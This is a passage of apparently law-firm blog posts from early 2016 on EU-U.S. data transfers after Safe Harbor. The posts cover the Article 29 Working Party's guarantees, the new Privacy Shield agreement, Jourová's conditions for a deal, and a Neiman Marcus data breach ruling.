  • The necessity and proportionality of the processing and transfer of personal data must be demonstrated. A balance should be found between the rights of individuals and the purposes for which data are collected and accessed in the context of national security.
  • An effective, impartial and independent oversight mechanism should exist to monitor the collection of and access to personal data.
  • Individuals must have access to effective remedies to defend their rights.

These four guarantees must be respected when transferring personal data not only to the U.S., but also to other third countries, as well as to EU Member States.

Assessment of EU-U.S. Privacy Shield

The Working Party states that it still has concerns that the U.S. legal framework does not meet the four guarantees identified above, in particular with regard to the scope of these guarantees and the remedies available to individuals.

The Working Party will therefore analyze the agreement reached between the European Commission and the U.S., and assess whether the EU-U.S. Privacy Shield satisfies the four guarantees with respect to intelligence activities. The Working Party also will assess whether the new arrangement provides legal certainty for the other data transfer mechanisms.

The Working Party stated that, in any event, transfers of personal data to the U.S. may no longer take place on the basis of the invalidated Safe Harbor Decision. In the meantime, companies may still rely on the other data transfer mechanisms. However, national data protection authorities will handle any related cases and complaints on a case-by-case basis.

Next Steps and Timing

The Working Party asked the European Commission to deliver all documents on the EU-U.S. Privacy Shield to the Working Party by the end of February. An extraordinary plenary meeting of the Working Party will then be organized around the end of March. After this, the Working Party will consider whether the other data transfer mechanisms remain valid for transfers of personal data to the U.S. According to the Chair of the Working Party, Isabelle Falque-Pierrotin, a final decision could be made by the end of April.

Plaintiffs Survive Motion to Dismiss in Remanded Data Breach Litigation

A federal judge of the U.S. District Court for the Northern District of Illinois denied Neiman Marcus' motion to dismiss in Remijas et al. v. Neiman Marcus Group, LLC, No. 1:14-cv-01735. As we previously reported, the Seventh Circuit reversed Judge James B. Zagel's earlier decision dismissing the class action complaint based on Article III standing. At that time, the Seventh Circuit declined to analyze dismissal under Federal Rule of Civil Procedure 12(b)(6) due to, among other reasons, the district court's focus on standing.

After remand, the parties’ supplemental dismissal briefing addressed whether the plaintiffs pleaded sufficient facts to plausibly establish causation and injury. Judge Zagel simply stated in a docket entry that dismissal was “not appropriate at this time.”

New Deal Between EU and U.S. Reached Regarding Transatlantic Data Transfers

On February 2, 2016, a new EU-U.S. transatlantic data transfer agreement was reached. Věra Jourová, European Commissioner for Justice, Consumers and Gender Equality, presented the new agreement to the European Commission (the “Commission”) that same day. According to the Commission's press release, the new agreement will be called the EU-U.S. Privacy Shield.

According to Commissioner Jourová, “[t]he new EU-US Privacy Shield will protect the fundamental rights of Europeans when their personal data is transferred to U.S. companies. For the first time ever, the United States has given the EU binding assurances that the access of public authorities for national security purposes will be subject to clear limitations, safeguards and oversight mechanisms. Also for the first time, EU citizens will benefit from redress mechanisms in this area. In the context of the negotiations for this agreement, the U.S. has assured that it does not conduct mass or indiscriminate surveillance of Europeans. We have established an annual joint review in order to closely monitor the implementation of these commitments.”

As we previously reported on February 1, Jourová had told the European Parliament that a new agreement had not yet been reached, indicating that an agreement was close but that additional work was needed to finalize it.

The EU-U.S. Privacy Shield comes in the wake of the Article 29 Working Party's announcement in October 2015 that if no agreement were reached by the end of January 2016, the individual national data protection authorities might decide to take coordinated enforcement actions against companies that continue to rely on the invalidated Safe Harbor agreement to transfer data.

Next Steps

According to the Commission's press release, the College of Commissioners (the “College”) has mandated that Vice President Ansip and Commissioner Jourová prepare a draft “adequacy decision” in the coming weeks, which could then be adopted by the College after obtaining the advice of the Article 29 Working Party and after consulting a committee composed of representatives of the EU Member States. The U.S. will also need to make the necessary preparations to put in place the new framework.

Safe Harbor Deal Between EU and U.S. Not Yet Reached as Negotiations Continue

On February 1, 2016, Věra Jourová, European Commissioner for Justice, Consumers and Gender Equality, told the European Parliament that an agreement on a new U.S.-EU Safe Harbor agreement has not yet been reached. Jourová indicated that an agreement is close, but additional work is needed to finalize it.

In her message to Parliament, Jourová indicated that any new Safe Harbor agreement would have to be fundamentally different from the original agreement and would have to be continually reviewed. She also indicated that any new agreement must be able to withstand potential new legal challenges and provide businesses with legal certainty regarding their ability to transfer data to the U.S.

In addition, Jourová laid out four key issues that need to be addressed:

  1. Limits and Safeguards for Accessing Data – Access to data for national security purposes in the U.S. must be limited to what is strictly necessary and proportionate, and must not entail indiscriminate mass surveillance of EU citizens. The U.S. needs to provide specific written assurances regarding these issues, and any new agreement will need to put in place an annual joint review of them.
  2. Oversight and Redress – There needs to be independent oversight of adherence to any new agreement, and redress for EU citizens who feel that their data has been used for wrongful purposes. An ombudsperson must be put in place who can respond to individuals’ complaints with respect to overreach by national security authorities.
  3. Resolution of Individual Complaints – Companies should resolve individuals' complaints regarding potential privacy violations. If a company cannot resolve a complaint, a third party, such as the Federal Trade Commission or a data protection authority (“DPA”), should resolve it free of charge. If such third parties cannot resolve the complaint, a last-resort mechanism must be put in place to ensure that all complaints are heard.
  4. Binding Commitment by the U.S. – The U.S.’s commitment to any new agreement must be formal and binding, and published in the Federal Register. Because the agreement will not technically be an international agreement, signatures at the highest level will be needed.

As we previously reported, the Article 29 Working Party announced in October 2015 that if no Safe Harbor agreement is reached by the end of January 2016, the individual national DPAs may decide to take coordinated enforcement actions against companies that continue to rely on the invalidated Safe Harbor agreement to transfer data. The Article 29 Working Party will meet in the coming days to discuss the ongoing negotiations and next steps.